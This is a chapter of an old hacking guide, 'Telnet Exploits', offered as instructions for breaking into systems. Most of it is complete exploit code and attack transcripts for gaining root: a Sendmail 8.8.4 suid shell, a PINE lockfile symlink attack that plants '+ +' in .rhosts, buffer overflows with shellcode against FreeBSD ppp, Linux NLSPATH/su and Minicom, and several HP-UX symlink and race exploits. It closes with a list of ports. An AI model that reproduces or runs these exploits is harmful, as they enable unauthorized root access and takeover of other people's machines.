Chapter 5: Telnet Exploits and Telnet Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It's best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I'm going to list a few below but the list of exploits is endless. This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up: cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi and now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts (for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was writen by Sean B. Hamor...For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } More exploits: -Hpux ppl exploit: #!/bin/ksh # ppl exploit, second part - SOD 15Oct96 # not all buffer overruns need to force an address into the PC # works on 10.X, too, oddly enough. - Script Junkie #HOST='localhost' #USER=`whoami` HOST="+" USER="+" cd /tmp rm core 2> /dev/null ln -s ~root/.rhosts core AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaa' STUFF=`echo "${AAA}\n${HOST} ${USER}"` ppl -o "${STUFF}" rm core remsh localhost -l root sh -i schlowdishk exploit: #!/bin/ksh # OK.. this bug gets inserted into remwatch after the patch.. It was there # before in some versions, but now it's pretty much universal if the patch # gets installed... # Silly Scriptor & friend, SOD, (11Jun96) if [ ! -x /usr/remwatch/bin/disks/showdisk ] then echo This is an exploit for the showdisk utility internal to echo HP\'s Remote Watch series of programs. echo The showdisk utility doesn\'t appear to be on your system. echo Moo exit fi FILE=$1 if [ -z "$FILE" ] then FILE=/.rhosts fi if [ -f "$FILE" ] then echo "Hey, there already a ${FILE}!" echo "I'd rather enjoy making new files, thank you very much..." exit fi umask 0000 /usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1 >${FILE} ls -l ${FILE} if [ "${FILE}" = "/.rhosts" ] then echo "Adding + + ..." echo "+ +" >> /.rhosts remsh localhost -l root ksh -i fi glance exploit: You need only do the following: 1. Log in as yourself. 2. Decide what file you want to create for world write. 3. do a umask 000 4. Then do /usr/perf/bin/glance -f 5. After a few seconds, quit glance. 6. That file will now be there and world is writeable, now edit it. 7. If it previousle existed, it will be trunc'ed with orig perms. sysdiag exploit: Basically, the sysdiag stuff is set-uid root. You can exploit that feature to create and write stuff to arbitrary files on the system as root, while not being root. If the target file you want to create exists, this doesn't work. Perhaps there is a way around that, but that ain't the point. The point is that I used this to get root in 30 seconds on my HP's and that's not good. Heck, this is probably faster then asking for the root password !!! More on the problem: What happens is that a feature exists to create a log file of your sysdiag session that can be invoked while in the program. You give it the name of the file to create, and if it is a sym link to a non-existant file, sysdiag follows the sym link and creates the file as root for you and logs your session in it. To show a typical vunerability, I created /.rhosts from a sym link in /tmp that sysdiag followed and then caused sysdiag to echo the line "+ +" in to the file. Then I could rlogin as root. If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick to create and put a "+ +" in either of those files. That's an easy way to become root or someone else. You can do other files as well. This ain't cool, at all... How I tested this on my system: 1. I logged in with my regular account 2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile 3. I ran the command: /bin/sysdiag 4. From the DUI> prompt I typed: outfile /tmp/f1 5. From the DUI> prompt I typed: + + 6. From the DUI> prompt I typed: redo 7. When my previous command echoed to the screen I pressed . 8. From the DUI> prompt I typed: exit 9. Now at the shell prompt, and out of sysdiag, I typed: rlogin localhost -l root 10. Once logged in I typed: id and it said I was root... This is the script of my sysdiag session: Script started on Sat Sep 21 23:29:10 1996 $ id uid=1648(jjacobi) gid=999(systems) $ ls -l /tmp total 0 $ ls -l /.rhosts /.rhosts not found $ ln -s /.rhosts /tmp/tempfile $ ls -l /tmp total 2 lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile -> /.rhosts $ ls -l /.rhosts /.rhosts not found $ /bin/sysdiag sam exploit: Go to your HP 9.04/5 system first. 1. Log into your system as a normal user. 2. Compile the program below, making any changes if you need to. (you shouldn't need to) 3. Log in on another terminal, become root and insure that sam is not currently executing. 4. As the normal user log in, run the program that you compiled in step 2. 5. On the root log in session, run sam. 6. Look at the target file. /* Code to exploit race of sam calling iopasrer.sh It will usually cause the ioparser.sh script run by root to follow the sym links created here to create or truncate TARGET_FILENAME as root. It ain't pretty and may not always work, but usually does. Compile on HP9000/[700/800] 9.04[5] with the command: cc racer.c -o racer -Ae */ #include #include #include #include #include #include #include #define PROC_TO_LOOK_FOR "sam" /* The process to look for in ps */ #define TARGET_FILENAME "/check_this" /* File that is created or trunc'ed */ #define NUM_SYM_LINKS 50 /* Increase this for systems that fork() alot */ void main(void) { char ps_buf[65536]; /* ps data buffer */ char *line; /* a pointer in to the ps_buf */ char f1[80]; /* buffer space for the sym link name */ char hostname[32]; /* buffer space to hold hostname, duh */ int fd; /* fd is for the pipe */ int ext; /* the extantion to place on the symlink (pid) */ int loop; /* Dumb loop variable, suggestions ??? */ unlink("ps_fifo"); /* Why not */ mkfifo("ps_fifo",S_IRUSR|S_IWUSR); /* Need this */ fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe */ gethostname(hostname,32); /* gets the hostname just like ioparser.sh !!! */ printf("Looking for process %s, will exploit filename %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME); /* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */ while(1) { system("/bin/ps -u 0 > ps_fifo"); read(fd,ps_buf,65536); if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) { while( *line != '\n' ) { line--; } line+=2; line[5] = '\0'; ext = atoi(line); for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++) { sprintf(f1,"/tmp/%s.%d",hostname,ext + loop); symlink(TARGET_FILENAME,f1); } while( (access(TARGET_FILENAME,F_OK)) < 0 ); printf("%s has run, wait a few seconds and check %s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME); unlink("ps_fifo"); exit(); } } } -Linux nlspath exploit: /* * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 * Copyright (c) 1997 by Solar Designer */ #include #include #include char *shellcode = "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" "\xcd\x80/" "/bin/sh" "0"; char *get_sp() { asm("movl %esp,%eax"); } #define bufsize 2048 char buffer[bufsize]; main() { int i; for (i = 0; i < bufsize - 4; i += 4) *(char **)&buffer[i] = get_sp() - 3072; memset(buffer, 0x90, 512); memcpy(&buffer[512], shellcode, strlen(shellcode)); buffer[bufsize - 1] = 0; setenv("NLSPATH", buffer, 1); execl("/bin/su", "/bin/su", NULL); } --- nlspath.c --- And the shellcode separately: --- shellcode.s --- .text .globl shellcode shellcode: xorl %eax,%eax movb $0x31,%al int $0x80 xchgl %eax,%ebx xorl %eax,%eax movb $0x17,%al int $0x80 .byte 0x68 popl %ecx popl %eax jmp *%ecx call *%esp xorl %eax,%eax cltd movl %ecx,%edi movb $'/'-1,%al incl %eax scasb %es:(%edi),%al jne -3 movl %edi,(%ecx) movl %edx,4(%ecx) movl %edi,%ebx incl %eax scasb %es:(%edi),%al jne -3 movb %dl,-1(%edi) movb $0x0B,%al int $0x80 xorl %eax,%eax incl %eax xorl %ebx,%ebx int $0x80 .byte '/' .string "/bin/sh0" Minicom 1.75 exploit: #include #include #include #include #include #define NOP 0x90 const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...\n"; extern code(); void dummy( void ) { extern lbl(); /* do "exec( "/bin/sh" ); exit(0)" */ __asm__( " code: xorl %edx, %edx pushl %edx jmp lbl start2: movl %esp, %ecx popl %ebx movb %edx, 0x7(%ebx) xorl %eax, %eax movb $0xB, %eax int $0x80 xorl %ebx, %ebx xorl %eax, %eax inc %eax int $0x80 lbl: call start2 .string \"/bin/sh\" "); } void Fatal( int rv, const char *fmt, ... ) { va_list vl; va_start( vl, fmt ); vfprintf( stderr, fmt, vl ); va_end( vl ); exit( rv ); } int main( int ac, char **av ) { int buff_addr; /* where our code is */ int stack_offset = 0, buffer_size = 0, i, code_size; char *buffer, *p; buff_addr = (int)(&buff_addr); /* get the stack pointer */ code_size = strlen( (char *)code ); /* get the size of piece of */ /* code in dummy() */ if( ac < 5 ) Fatal( -1, usage, *av ); buff_addr -= strtol( av[ 1 ], NULL, 0 ); buffer_size = strtoul( av[ 2 ], NULL, 0 ); if( buffer_size < code_size + 4 ) Fatal( -1, "buffer is too short -- %d minimum.\n", code_size + 5); /* "this is supported, but not implemented yet" ;) */ if( (buffer = malloc( buffer_size )) == NULL ) Fatal( -1, "malloc(): %s\n", strerror( errno ) ); fprintf( stderr, "using buffer address 0x%8.8x\n", buff_addr ); for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 ) *(int *)(buffer + i) = buff_addr; memset( buffer, NOP, buffer_size/2 ); i = (buffer_size - code_size - 4)/2; memcpy( buffer + i, (char *)code, code_size ); buffer[ buffer_size - 1 ] = '\0'; p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 ); if( !p ) Fatal( -1, "malloc(): %s\n", strerror( errno ) ); strcpy( p, av[ ac - 1 ] ); strcat( p, buffer ); av[ ac - 1 ] = p; execve( av[ 3 ], av + 3, NULL ); perror( "exec():" ); } I will send out more exploits in the next book I write. Common Ports- Program / Name Port ________________________________________________________________________ discard 9 netstat 15 chargen 19 ftp 21 telnetd 23 smtp 25 rlp 39 bootp 67 fingerk 79 http 80 / 8080 military http 80 / 8080 / 5580 link 87 pop3 110 identd 113 nntp 119 newsk 144 execk 512 login 513 pkill 515 ktalk 517 ntalk 518 netwall 533 rmontior 560 montior 561 kerberos 750 Common telnet commands: Command Function access Telnet account c Connect to a host cont Continue d Disconnect full Network echo half Terminal echo hangup Hangs up mail Mail set Select PAD parameters stat Show network port. telemail Mail